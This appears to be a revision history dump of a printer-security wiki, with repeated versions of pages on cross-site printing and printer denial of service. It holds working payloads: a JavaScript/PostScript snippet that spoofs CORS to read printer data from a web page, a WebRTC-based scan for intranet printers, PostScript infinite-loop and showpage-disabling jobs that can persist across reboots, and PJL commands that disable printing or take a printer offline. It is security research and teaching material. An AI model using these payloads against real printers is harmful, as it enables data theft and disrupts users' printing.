accessible, we scan the subnet for printers as described before. == Proof-of-concept == A proof-of-concept implementation demonstrating that advanced cross-site printing attacks are practical and a real-world threat to companies and institutions is available at [http://hacking-printers.net/xsp/ hacking-printers.net/xsp/]. It was successfully tested on Firefox 48, Chrome 52, Opera 39 and Internet Explorer 10. It is worth noting that the [https://torproject.org/projects/torbrowser.html.en Tor Browser] blocks the attack because it tries to connect to all addresses – including local ones – through the Tor network meaning XSP requests never reach the intranet printer. ---- f8e030c1a1e9746e660af5cd948242d2d1ca7700 251 230 2017-01-28T14:20:37Z Admin 1 wikitext text/x-wiki Cross-site printing (XSP) attacks empower a web attacker to access the printer device as demonstrated by <ref>''[http://helpnetsecurity.com/dl/articles/CrossSitePrinting.pdf Cross Site Printing]'', A. Weaver, 2007</ref> who use a hidden Iframe to send HTTP POST requests to port 9100/tcp of a printer within the victim's internal network. The HTTP header is either printed as plain text or discarded based on the printer's settings. The POST data however can contain arbitrary print jobs like [[PostScript]] or [[PJL]] commands to be interpreted. In the following, the idea of cross-site printing is adapted and improved which enables a web attacker to perform most attacks described in wiki obtaining captured print jobs, using the victim's web browser acts as a carrier. [[File:XSP-deployment-channel.png|500px|Deployment of (potentially malicious) print jobs with XSP]] == Enhanced cross-site printing == Instead of Iframes, we use XMLHttpRequest (XHR) JavaScript objects as defined in <ref>''[https://www.w3.org/TR/XMLHttpRequest/ The XMLHttpRequest Object]'', A. van Kesteren and D. Jackson, W3C, Working Draft, 2007</ref> to perform HTTP POST requests to internal printers. A limitation of the cross-site printing approach discussed so far is that data can only be send to the device, not received because of the same-origin policy <ref>''[https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy The Same Origin Policy]'', J. Ruderman, 2001</ref>. This opts out all information disclosure attacks. To bend the restrictions of the same-origin policy, cross-origin resource sharing (CORS) <ref>''[https://www.w3.org/TR/cors/ Cross-Origin Resource Sharing]'', A. van Kesteren and others, W3C, Working Draft, 2010</ref> can be used – if the web server explicitly allows it by sending a special HTTP header field. In the scenario of cross-site printing, however, we have full control of what the requested ‘web server’ – which actually is a printer [https://en.wikipedia.org/wiki/Raster_image_processor RIP] accessed over port 9100/tcp – sends back to the browser. By using PostScript output commands we can simply emulate an HTTP server running on port 9100/tcp and define our own HTTP header to be responded – including arbitrary CORS <code>Access-Control-Allow-Origin</code> fields which instruct the web browser to allow JavaScript access to this resource and therefore punch a whole into the same-origin policy. A schematic overview of the attack is given below: [[File:Cross-site-printing.png|900px|Advanced cross-site printing with CORS spoofing]] In such an enhanced variant of XSP – combined with CORS spoofing – a web attacker has full access to the HTTP response which allows her to extract arbitrary information like captured print jobs from the printer device. A proof-of-concept JavaScript snipplet is shown below: <syntaxhighlight lang=postscript> job = "\x1B%-12345X\r\n" + "%!\r\n" + "(HTTP/1.0 200 OK\\n) print\r\n" + "(Server: PostScript HTTPD\\n) print\r\n" + "(Access-Control-Allow-Origin: *\\n) print\r\n" + "(Connection: close\\n) print\r\n" + "(Content-Length: ) print\r\n" + "product dup length dup string cvs print\r\n" + "(\\n\\n) print\r\n" + "print\r\n" + "(\\n) print flush\r\n" + "\x1B%-12345X\r\n"; var x = new XMLHttpRequest(); x.open("POST", "http://printer:9100"); x.send(job); x.onreadystatechange = function() { if (x.readyState == 4) alert(x.responseText); }; </syntaxhighlight> == Limitations of cross-site printing == Note that [[PCL]] as page description language is not applicable for CORS spoofing because it only allows one single number to be echoed. [[PJL]] likewise cannot be used because unfortunately it prepends <code>@PJL ECHO</code> to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does not mean that enhanced XSP attacks are limited to [[PostScript]] jobs: PostScript can be used to respond with a spoofed HTTP header and the [[UEL]] can further be invoked to switch the printer language. This way a web attacker can also obtain the results for PJL commands. Two implementation pitfalls exist which deserve to be mentioned: First, a correct <code>Content-Length</code> for the data to be responded needs determined with PostScript. If the attacker cannot predict the overall size of the response and chunked encoding as well is not an option, she needs to set a very high value and use padding. Second, adding the <code>Connection: close</code> header field is important, otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a timeout, which means the printer will not be accessible for some time. If the printer device supports plain text printing the HTTP request header of the XHR is printed out as hard copy – including the <code>Origin</code> header field containing the URL that invoked the malicious JavaScript, thus making it hard for an attacker to stay silent. This is unavoidable, as we do not gain control over the printer – and under some circumstances can disable printing functionality – until the HTTP body is processed and the HTTP header has already been interpreted as plain text by the printer device. If reducing noise is a priority, the attacker can however try to first disable printing functionality with proprietary PJL commands as proposed in [[Document processing#PJL_jobmedia|PJL jobmedia]] using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all protocols could successfully be tested to deploy print jobs using variants of cross-protocol scripting as described by <ref>''[http://www.remote.org/jochen/sec/hfpa/hfpa.pdf The HTML Form Protocol Attack]'', J. Topf, BugTraq posting, 2001</ref> and <ref>''[https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/inter-protocol_exploitation.pdf Inter-Protocol Exploitation]'', W. Alcorn, NGSSoftware Insight Security Research (NISR), 2007</ref> they have some drawbacks beyond not providing feedback using spoofed CORS headers: * Cross-protocol access to LPD and FTP ports is blocked by various web browsers * Parameters for direct printing over the embedded web server are model-specific * The IPP standard requires the <code>Content-type</code> for HTTP POST requests being set to <code>application/ipp</code> <ref>''[https://tools.ietf.org/html/rfc2910 RFC2910 – Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> which cannot be done with XHR objects – it is however up to the implementation to actually care about incorrect types A comparison of cross-site printing channels is given in below: {| class="wikitable" style="text-align:center" |+ Comparison of cross-site printing channels |- ! Method !! No Feedback !! Unsolicited printouts !! Standardized !! Blocked by |- | Raw || || ✔ || ✔ || |- | Web || ✔ || || || |- | IPP || ✔ || || ✔ || |- | LPD || ✔ || || ✔ || FF, Ch, Op |- | FTP || ✔ || || ✔ || FF, Ch, Op, IE |- |} One major problem of XSP is to find out the correct address or hostname of the printer. Our approach is to abuse WebRTC <ref>''[https://www.w3.org/TR/webrtc/ WebRTC 1.0: Real-time Communication Between Browsers]'', D. Bergkvist and D. Burnett and C. Jennings, W3C, Working Draft, 2014</ref> which is implemented in most modern browsers and has the feature to enumerate IP addresses for local network interfaces. Given the local IP address, XHR objects are further used to open connections to port 9100/tcp for all 253 remaining addresses to retrieve the printer product name using PostScript and CORS spoofing which only takes seconds in our tests. If the printer is on the same subnet as the victim's host its address can be detected solely using JavaScript. WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge. Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we apply an intelligent brute-force approach: We try to connect to port 80 of the victim's router using XHR objects. For this, a list of 115 default router addresses from various internet-accessible resources was compiled. If a router is accessible, we scan the subnet for printers as described before. == Proof-of-concept == A proof-of-concept implementation demonstrating that advanced cross-site printing attacks are practical and a real-world threat to companies and institutions is available at [http://hacking-printers.net/xsp/ hacking-printers.net/xsp/]. It was successfully tested on Firefox 48, Chrome 52, Opera 39 and Internet Explorer 10. It is worth noting that the [https://torproject.org/projects/torbrowser.html.en Tor Browser] blocks the attack because it tries to connect to all addresses – including local ones – through the Tor network meaning XSP requests never reach the intranet printer. ---- a904296ae8135a9c9f4c1e5acbd5212150c0f23a 230 229 2017-01-24T18:53:17Z Admin 1 wikitext text/x-wiki Cross-site printing (XSP) attacks empower a web attacker to access the printer device as demonstrated by <ref>''[http://helpnetsecurity.com/dl/articles/CrossSitePrinting.pdf Cross Site Printing]'', A. Weaver, 2007</ref> who use a hidden Iframe to send HTTP POST requests to port 9100/tcp of a printer within the victim's internal network. The HTTP header is either printed as plain text or discarded based on the printer's settings. The POST data however can contain arbitrary print jobs like [[PostScript]] or [[PJL]] commands to be interpreted. In the following, the idea of cross-site printing is adapted and improved which enables a web attacker to perform most attacks described in wiki obtaining captured print jobs, using the victim's web browser acts as a carrier. == Enhanced cross-site printing == Instead of Iframes, we use XMLHttpRequest (XHR) JavaScript objects as defined in <ref>''[https://www.w3.org/TR/XMLHttpRequest/ The XMLHttpRequest Object]'', A. van Kesteren and D. Jackson, W3C, Working Draft, 2007</ref> to perform HTTP POST requests to internal printers. A limitation of the cross-site printing approach discussed so far is that data can only be send to the device, not received because of the same-origin policy <ref>''[https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy The Same Origin Policy]'', J. Ruderman, 2001</ref>. This opts out all information disclosure attacks. To bend the restrictions of the same-origin policy, cross-origin resource sharing (CORS) <ref>''[https://www.w3.org/TR/cors/ Cross-Origin Resource Sharing]'', A. van Kesteren and others, W3C, Working Draft, 2010</ref> can be used – if the web server explicitly allows it by sending a special HTTP header field. In the scenario of cross-site printing, however, we have full control of what the requested ‘web server’ – which actually is a printer [https://en.wikipedia.org/wiki/Raster_image_processor RIP] accessed over port 9100/tcp – sends back to the browser. By using PostScript output commands we can simply emulate an HTTP server running on port 9100/tcp and define our own HTTP header to be responded – including arbitrary CORS <code>Access-Control-Allow-Origin</code> fields which instruct the web browser to allow JavaScript access to this resource and therefore punch a whole into the same-origin policy. A schematic overview of the attack is given below: [[File:Cross-site-printing.png|900px|Advanced cross-site printing with CORS spoofing]] In such an enhanced variant of XSP – combined with CORS spoofing – a web attacker has full access to the HTTP response which allows her to extract arbitrary information like captured print jobs from the printer device. A proof-of-concept JavaScript snipplet is shown below: <syntaxhighlight lang=postscript> job = "\x1B%-12345X\r\n" + "%!\r\n" + "(HTTP/1.0 200 OK\\n) print\r\n" + "(Server: PostScript HTTPD\\n) print\r\n" + "(Access-Control-Allow-Origin: *\\n) print\r\n" + "(Connection: close\\n) print\r\n" + "(Content-Length: ) print\r\n" + "product dup length dup string cvs print\r\n" + "(\\n\\n) print\r\n" + "print\r\n" + "(\\n) print flush\r\n" + "\x1B%-12345X\r\n"; var x = new XMLHttpRequest(); x.open("POST", "http://printer:9100"); x.send(job); x.onreadystatechange = function() { if (x.readyState == 4) alert(x.responseText); }; </syntaxhighlight> == Limitations of cross-site printing == Note that [[PCL]] as page description language is not applicable for CORS spoofing because it only allows one single number to be echoed. [[PJL]] likewise cannot be used because unfortunately it prepends <code>@PJL ECHO</code> to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does not mean that enhanced XSP attacks are limited to [[PostScript]] jobs: PostScript can be used to respond with a spoofed HTTP header and the [[UEL]] can further be invoked to switch the printer language. This way a web attacker can also obtain the results for PJL commands. Two implementation pitfalls exist which deserve to be mentioned: First, a correct <code>Content-Length</code> for the data to be responded needs determined with PostScript. If the attacker cannot predict the overall size of the response and chunked encoding as well is not an option, she needs to set a very high value and use padding. Second, adding the <code>Connection: close</code> header field is important, otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a timeout, which means the printer will not be accessible for some time. If the printer device supports plain text printing the HTTP request header of the XHR is printed out as hard copy – including the <code>Origin</code> header field containing the URL that invoked the malicious JavaScript, thus making it hard for an attacker to stay silent. This is unavoidable, as we do not gain control over the printer – and under some circumstances can disable printing functionality – until the HTTP body is processed and the HTTP header has already been interpreted as plain text by the printer device. If reducing noise is a priority, the attacker can however try to first disable printing functionality with proprietary PJL commands as proposed in [[Document processing#PJL_jobmedia|PJL jobmedia]] using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all protocols could successfully be tested to deploy print jobs using variants of cross-protocol scripting as described by <ref>''[http://www.remote.org/jochen/sec/hfpa/hfpa.pdf The HTML Form Protocol Attack]'', J. Topf, BugTraq posting, 2001</ref> and <ref>''[https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/inter-protocol_exploitation.pdf Inter-Protocol Exploitation]'', W. Alcorn, NGSSoftware Insight Security Research (NISR), 2007</ref> they have some drawbacks beyond not providing feedback using spoofed CORS headers: * Cross-protocol access to LPD and FTP ports is blocked by various web browsers * Parameters for direct printing over the embedded web server are model-specific * The IPP standard requires the <code>Content-type</code> for HTTP POST requests being set to <code>application/ipp</code> <ref>''[https://tools.ietf.org/html/rfc2910 RFC2910 – Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> which cannot be done with XHR objects – it is however up to the implementation to actually care about incorrect types A comparison of cross-site printing channels is given in below: {| class="wikitable" style="text-align:center" |+ Comparison of cross-site printing channels |- ! Method !! No Feedback !! Unsolicited printouts !! Standardized !! Blocked by |- | Raw || || ✔ || ✔ || |- | Web || ✔ || || || |- | IPP || ✔ || || ✔ || |- | LPD || ✔ || || ✔ || FF, Ch, Op |- | FTP || ✔ || || ✔ || FF, Ch, Op, IE |- |} One major problem of XSP is to find out the correct address or hostname of the printer. Our approach is to abuse WebRTC <ref>''[https://www.w3.org/TR/webrtc/ WebRTC 1.0: Real-time Communication Between Browsers]'', D. Bergkvist and D. Burnett and C. Jennings, W3C, Working Draft, 2014</ref> which is implemented in most modern browsers and has the feature to enumerate IP addresses for local network interfaces. Given the local IP address, XHR objects are further used to open connections to port 9100/tcp for all 253 remaining addresses to retrieve the printer product name using PostScript and CORS spoofing which only takes seconds in our tests. If the printer is on the same subnet as the victim's host its address can be detected solely using JavaScript. WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge. Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we apply an intelligent brute-force approach: We try to connect to port 80 of the victim's router using XHR objects. For this, a list of 115 default router addresses from various internet-accessible resources was compiled. If a router is accessible, we scan the subnet for printers as described before. == Proof-of-concept == A proof-of-concept implementation demonstrating that advanced cross-site printing attacks are practical and a real-world threat to companies and institutions is available at [http://hacking-printers.net/xsp/ hacking-printers.net/xsp/]. It was successfully tested on Firefox 48, Chrome 52, Opera 39 and Internet Explorer 10. It is worth noting that the [https://torproject.org/projects/torbrowser.html.en Tor Browser] blocks the attack because it tries to connect to all addresses – including local ones – through the Tor network meaning XSP requests never reach the intranet printer. ---- f8ea2867a4d6832160d20a5ca4535baf4b4a42cc 229 2017-01-24T18:50:13Z Admin 1 Created page with "Cross-site printing (XSP) attacks empower a web attacker to access the printer device as demonstrated by <ref>''[http://helpnetsecurity.com/dl/articles/CrossSitePrinting.pdf C..." wikitext text/x-wiki Cross-site printing (XSP) attacks empower a web attacker to access the printer device as demonstrated by <ref>''[http://helpnetsecurity.com/dl/articles/CrossSitePrinting.pdf Cross Site Printing]'', A. Weaver, 2007</ref> who use a hidden Iframe to send HTTP POST requests to port 9100/tcp of a printer within the victim's internal network. The HTTP header is either printed as plain text or discarded based on the printer's settings. The POST data however can contain arbitrary print jobs like [[PostScript]] or [[PJL]] commands to be interpreted. In the following, the idea of cross-site printing is adapted and improved which enables a web attacker to perform most attacks described in wiki obtaining captured print jobs, using the victim's web browser acts as a carrier. === Enhanced cross-site printing === Instead of Iframes, we use XMLHttpRequest (XHR) JavaScript objects as defined in <ref>''[https://www.w3.org/TR/XMLHttpRequest/ The XMLHttpRequest Object]'', A. van Kesteren and D. Jackson, W3C, Working Draft, 2007</ref> to perform HTTP POST requests to internal printers. A limitation of the cross-site printing approach discussed so far is that data can only be send to the device, not received because of the same-origin policy <ref>''[https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy The Same Origin Policy]'', J. Ruderman, 2001</ref>. This opts out all information disclosure attacks. To bend the restrictions of the same-origin policy, cross-origin resource sharing (CORS) <ref>''[https://www.w3.org/TR/cors/ Cross-Origin Resource Sharing]'', A. van Kesteren and others, W3C, Working Draft, 2010</ref> can be used – if the web server explicitly allows it by sending a special HTTP header field. In the scenario of cross-site printing, however, we have full control of what the requested ‘web server’ – which actually is a printer [https://en.wikipedia.org/wiki/Raster_image_processor RIP] accessed over port 9100/tcp – sends back to the browser. By using PostScript output commands we can simply emulate an HTTP server running on port 9100/tcp and define our own HTTP header to be responded – including arbitrary CORS <code>Access-Control-Allow-Origin</code> fields which instruct the web browser to allow JavaScript access to this resource and therefore punch a whole into the same-origin policy. A schematic overview of the attack is given below: [[File:Cross-site-printing.png|900px|Advanced cross-site printing with CORS spoofing]] In such an enhanced variant of XSP – combined with CORS spoofing – a web attacker has full access to the HTTP response which allows her to extract arbitrary information like captured print jobs from the printer device. A proof-of-concept JavaScript snipplet is shown below: <syntaxhighlight lang=postscript> job = "\x1B%-12345X\r\n" + "%!\r\n" + "(HTTP/1.0 200 OK\\n) print\r\n" + "(Server: PostScript HTTPD\\n) print\r\n" + "(Access-Control-Allow-Origin: *\\n) print\r\n" + "(Connection: close\\n) print\r\n" + "(Content-Length: ) print\r\n" + "product dup length dup string cvs print\r\n" + "(\\n\\n) print\r\n" + "print\r\n" + "(\\n) print flush\r\n" + "\x1B%-12345X\r\n"; var x = new XMLHttpRequest(); x.open("POST", "http://printer:9100"); x.send(job); x.onreadystatechange = function() { if (x.readyState == 4) alert(x.responseText); }; </syntaxhighlight> '''Limitations of cross-site printing''' Note that [[PCL]] as page description language is not applicable for CORS spoofing because it only allows one single number to be echoed. [[PJL]] likewise cannot be used because unfortunately it prepends <code>@PJL ECHO</code> to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does not mean that enhanced XSP attacks are limited to [[PostScript]] jobs: PostScript can be used to respond with a spoofed HTTP header and the [[UEL]] can further be invoked to switch the printer language. This way a web attacker can also obtain the results for PJL commands. Two implementation pitfalls exist which deserve to be mentioned: First, a correct <code>Content-Length</code> for the data to be responded needs determined with PostScript. If the attacker cannot predict the overall size of the response and chunked encoding as well is not an option, she needs to set a very high value and use padding. Second, adding the <code>Connection: close</code> header field is important, otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a timeout, which means the printer will not be accessible for some time. If the printer device supports plain text printing the HTTP request header of the XHR is printed out as hard copy – including the <code>Origin</code> header field containing the URL that invoked the malicious JavaScript, thus making it hard for an attacker to stay silent. This is unavoidable, as we do not gain control over the printer – and under some circumstances can disable printing functionality – until the HTTP body is processed and the HTTP header has already been interpreted as plain text by the printer device. If reducing noise is a priority, the attacker can however try to first disable printing functionality with proprietary PJL commands as proposed in [[Document processing#PJL_jobmedia|PJL jobmedia]] using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all protocols could successfully be tested to deploy print jobs using variants of cross-protocol scripting as described by <ref>''[http://www.remote.org/jochen/sec/hfpa/hfpa.pdf The HTML Form Protocol Attack]'', J. Topf, BugTraq posting, 2001</ref> and <ref>''[https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/inter-protocol_exploitation.pdf Inter-Protocol Exploitation]'', W. Alcorn, NGSSoftware Insight Security Research (NISR), 2007</ref> they have some drawbacks beyond not providing feedback using spoofed CORS headers: * Cross-protocol access to LPD and FTP ports is blocked by various web browsers * Parameters for direct printing over the embedded web server are model-specific * The IPP standard requires the <code>Content-type</code> for HTTP POST requests being set to <code>application/ipp</code> <ref>''[https://tools.ietf.org/html/rfc2910 RFC2910 – Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> which cannot be done with XHR objects – it is however up to the implementation to actually care about incorrect types A comparison of cross-site printing channels is given in below: {| class="wikitable" style="text-align:center" |+ Comparison of cross-site printing channels |- ! Method !! No Feedback !! Unsolicited printouts !! Standardized !! Blocked by |- | Raw || || ✔ || ✔ || |- | Web || ✔ || || || |- | IPP || ✔ || || ✔ || |- | LPD || ✔ || || ✔ || FF, Ch, Op |- | FTP || ✔ || || ✔ || FF, Ch, Op, IE |- |} One major problem of XSP is to find out the correct address or hostname of the printer. Our approach is to abuse WebRTC <ref>''[https://www.w3.org/TR/webrtc/ WebRTC 1.0: Real-time Communication Between Browsers]'', D. Bergkvist and D. Burnett and C. Jennings, W3C, Working Draft, 2014</ref> which is implemented in most modern browsers and has the feature to enumerate IP addresses for local network interfaces. Given the local IP address, XHR objects are further used to open connections to port 9100/tcp for all 253 remaining addresses to retrieve the printer product name using PostScript and CORS spoofing which only takes seconds in our tests. If the printer is on the same subnet as the victim's host its address can be detected solely using JavaScript. WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge. Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we apply an intelligent brute-force approach: We try to connect to port 80 of the victim's router using XHR objects. For this, a list of 115 default router addresses from various internet-accessible resources was compiled. If a router is accessible, we scan the subnet for printers as described before. == Proof-of-concept == A proof-of-concept implementation demonstrating that advanced cross-site printing attacks are practical and a real-world threat to companies and institutions is available at [http://hacking-printers.net/xsp/ hacking-printers.net/xsp/]. It was successfully tested on Firefox 48, Chrome 52, Opera 39 and Internet Explorer 10. It is worth noting that the [https://torproject.org/projects/torbrowser.html.en Tor Browser] blocks the attack because it tries to connect to all addresses – including local ones – through the Tor network meaning XSP requests never reach the intranet printer. ---- 1b05cae6baa629cc3b1653adb7d4b51c6fecb662 0 40 326 325 2017-01-31T15:35:12Z Admin 1 wikitext text/x-wiki ''' ''Rule of thumb: ‘If you can print, you can prevent others from printing’'' ''' Any network resource can be slowed down or even made completely unavailable to legitimate users by consuming its resources in terms of CPU/memory or bandwidth. Common techniques involve stressing services (for example, web servers and applications) or protocols on the network level (for example, [https://en.wikipedia.org/wiki/SYN_flood SYN flooding] or more advanced [https://en.wikipedia.org/wiki/Slowloris_%28computer_security%29 Slowloris] attacks). While those generic attacks work against network printers too, this wiki focuses on printer-specific denial of service attacks and gives a brief overview of methods to cause loss of availability and show that this can be accomplished by very simple means. While the business impact of unavailable printers might be limited in most offices, time-critical industries like overnight digital printing companies may suffer '''financial loss''' even for short-term outages. <!-- ''' ''Captain Obvious says: ‘Just send many documents with highest priority’'' ''' A trivial but effective way to keep a printing device busy is to send a large number of documents. If the print spooler receives more jobs than it can process the queue will fill up, suspending print jobs from legitimate users. Such unsolicited print jobs are preferably set to the highest priority if the printing protocol allows prioritization. This simple attack works, because print spoolers are usually designed as ''FIFO'' queues instead of using a more ‘fair’ or balanced algorithm to protect against power users. --> ''Currently, the following denial of service techniques are discussed in this wiki:'' * [[Transmission channel]] – Blocking others by keeping a connection to port 9100/tcp open * [[Document processing]] – Using PostScript and PJL to break printing functionality * [[Physical damage]] – Exhausting the NVRAM's limited number of write cycles bfbbddf9e6acc0017f9aa875b15020b0c6b066c9 325 154 2017-01-31T15:34:49Z Admin 1 wikitext text/x-wiki ''' ''Rule of thumb: ‘If you can print, you can prevent others from printing’'' ''' Any network resource can be slowed down or even made completely unavailable to legitimate users by consuming its resources in terms of CPU/memory or bandwidth. Common techniques involve stressing services (for example, web servers and applications) or protocols on the network level (for example, [https://en.wikipedia.org/wiki/SYN_flood SYN flooding] or more advanced [https://en.wikipedia.org/wiki/Slowloris_%28computer_security%29 Slowloris] attacks). While those generic attacks work against network printers too, this wiki focuses on printer-specific denial of service attacks and gives a brief overview of methods to cause loss of availability and show that this can be accomplished by very simple means. While the business impact of unavailable printers might be limited in most offices, time-critical industries like overnight digital printing companies may suffer '''financial loss even for short-term outages'''. <!-- ''' ''Captain Obvious says: ‘Just send many documents with highest priority’'' ''' A trivial but effective way to keep a printing device busy is to send a large number of documents. If the print spooler receives more jobs than it can process the queue will fill up, suspending print jobs from legitimate users. Such unsolicited print jobs are preferably set to the highest priority if the printing protocol allows prioritization. This simple attack works, because print spoolers are usually designed as ''FIFO'' queues instead of using a more ‘fair’ or balanced algorithm to protect against power users. --> ''Currently, the following denial of service techniques are discussed in this wiki:'' * [[Transmission channel]] – Blocking others by keeping a connection to port 9100/tcp open * [[Document processing]] – Using PostScript and PJL to break printing functionality * [[Physical damage]] – Exhausting the NVRAM's limited number of write cycles 1b307e2901721cb1344de4a10d900e9049b05ed5 154 2017-01-15T16:53:40Z 92.227.58.56 0 Created page with "''' ''Rule of thumb: ‘If you can print, you can prevent others from printing’'' ''' Any network resource can be slowed down or even made completely unavailable to legitim..." wikitext text/x-wiki ''' ''Rule of thumb: ‘If you can print, you can prevent others from printing’'' ''' Any network resource can be slowed down or even made completely unavailable to legitimate users by consuming its resources in terms of CPU/memory or bandwidth. Common techniques involve stressing services (for example, web servers and applications) or protocols on the network level (for example, [https://en.wikipedia.org/wiki/SYN_flood SYN flooding] or more advanced [https://en.wikipedia.org/wiki/Slowloris_%28computer_security%29 Slowloris] attacks). While those generic attacks work against network printers too, this wiki focuses on printer-specific denial of service attacks and gives a brief overview of methods to cause loss of availability and show that this can be accomplished by very simple means. While the business impact of unavailable printers might be limited in most offices, time-critical industries like overnight digital printing companies may suffer financial loss even for short-term outages. <!-- ''' ''Captain Obvious says: ‘Just send many documents with highest priority’'' ''' A trivial but effective way to keep a printing device busy is to send a large number of documents. If the print spooler receives more jobs than it can process the queue will fill up, suspending print jobs from legitimate users. Such unsolicited print jobs are preferably set to the highest priority if the printing protocol allows prioritization. This simple attack works, because print spoolers are usually designed as ''FIFO'' queues instead of using a more ‘fair’ or balanced algorithm to protect against power users. --> ''Currently, the following denial of service techniques are discussed in this wiki:'' * [[Transmission channel]] – Blocking others by keeping a connection to port 9100/tcp open * [[Document processing]] – Using PostScript and PJL to break printing functionality * [[Physical damage]] – Exhausting the NVRAM's limited number of write cycles 3e4a49e0a87bb3db506f14d838e025ba488b0d5f 0 42 609 305 2017-02-08T16:43:44Z Admin 1 wikitext text/x-wiki Page description languages allowing infinite loops or calculations that require a lot of computing time can be abused to keep the printer's [https://en.wikipedia.org/wiki/Raster_image_processor RIP] busy. Examples of this are complex [https://en.wikipedia.org/wiki/HPGL HP-GL] calculations and [[PostScript]] programs. Even minimalist languages like [[PCL]] can be used to upload permanent macros or fonts until the available memory is consumed. [[PJL]] on HP devices has undocumented features to completely disable further printing functionality. In this article, various practical approaches of malicious print jobs which lead to denial of service are discussed. == PostScript == === Infinite loops === One trivial example of an infinite loop written in PostScript is given below: <syntaxhighlight lang=postscript> %! {} loop </syntaxhighlight> This minimalist document keeps a PostScript interpreter busy forever. In an evaluation with a pool of 20 test printers, only one had a watchdog mechanism and restarted itself after about 10 minutes. The other devices did not accept print jobs anymore until the test was ultimately interrupted after half an hour. The malicious print job could in most cases manually be canceled from the control panel, while some devices required a manual restart. In contrast to blocking the [[transmission channel]], the connection can be closed immediately after the PostScript code has been sent. Another variant of this attack is to write the code into ''Sys/Start'' or similar files which are executed at interpreter startup and even '''survive a reboot''' on devices with a [[File system access|writable disk]]. '''How to test for this attack?''' Use [[PRET]]'s ''hang'' command in ''ps'' mode: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> hang Warning: This command causes an infinite loop rendering the device useless until manual restart. Press CTRL+C to abort. Executing PostScript infinite loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM! '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. === Redefine showpage === Another approach is to permanently redefine PostScript operators as described in [[PostScript#Security features|security features]]. By setting ''showpage'' – which is used in every document to actually print the page – to do nothing at all, PostScript jobs are processed but not put to paper anymore. Example code is given below: <syntaxhighlight lang=postscript> true 0 startjob /showpage {} def </syntaxhighlight> Again, this code can also be written into ''Sys/Start'', ''startup.ps'' or similar files to cause '''permanent DoS''' on devices with a [[File system access|writable disk]]. '''How to test for this attack?''' Use [[PRET]]'s ''disable'' command in ''ps'' mode: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> disable Disabling printing functionality '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PJL == === PJL jobmedia === Proprietary PJL commands <ref>''[http://www.icareasc.com/ICareKM/University/TrainingMaterial/The%20German%20Laserweb/general/software-downloads/paperpathtest%20without%20paper.htm The German Laserweb Vers. 4.0: Test without Paper]'', ATS/GCC Team Germany</ref> can be used to set the older HP devices like the LaserJet 4k series into service mode and completely disable all printing functionality as shown below: @PJL SET SERVICEMODE=HPBOISEID @PJL DEFAULT JOBMEDIA=OFF '''How to test for this attack?''' Use [[PRET]]'s ''disable'' command in ''pjl'' mode: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> disable Printing functionality: OFF '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. === Offline mode === In addition, the PJL standard defines the ''OPMSG'' command which ‘prompts the printer to display a specified message and go offline’ \cite{hp1997pjl}. This can be used to simulate a paper jam as shown in below: @PJL OPMSG DISPLAY="PAPER JAM IN ALL DOORS" The command is supported by various printer models of different manufacturers. The device can however be easily brought to accept jobs again by manually pressing the ''online'' button on the control panel. '''How to test for this attack?''' Use [[PRET]]'s ''offline'' command in ''pjl'' mode: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> offline "MESSAGE TO DSIPLAY" Warning: Taking the printer offline will prevent yourself and others from printing or re-connecting to the device. Press CTRL+C to abort. Taking printer offline in... 10 9 8 7 6 5 4 3 2 1 KABOOM! '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- dc4ed1a238bc0f91e27a700d93b144f6f7943faf 305 304 2017-01-31T08:09:36Z 84.153.135.37 0 /* Infinite loops */ wikitext text/x-wiki Page description languages allowing infinite loops or calculations that require a lot of computing time can be abused to keep the printer's [https://en.wikipedia.org/wiki/Raster_image_processor RIP] busy. Examples of this are complex [https://en.wikipedia.org/wiki/HPGL HP-GL] calculations and [[PostScript]] programs. Even minimalist languages like [[PCL]] can be used to upload permanent macros or fonts until the available memory is consumed. [[PJL]] on HP devices has undocumented features to completely disable further printing functionality. In this article, various practical approaches of malicious print jobs which lead to denial of service are discussed. == PostScript == === Infinite loops === One trivial example of an infinite loop written in PostScript is given below: <syntaxhighlight lang=postscript> %! {} loop </syntaxhighlight> This minimalist document keeps a PostScript interpreter busy forever. In an evaluation with a pool of 20 test printers, only one had a watchdog mechanism 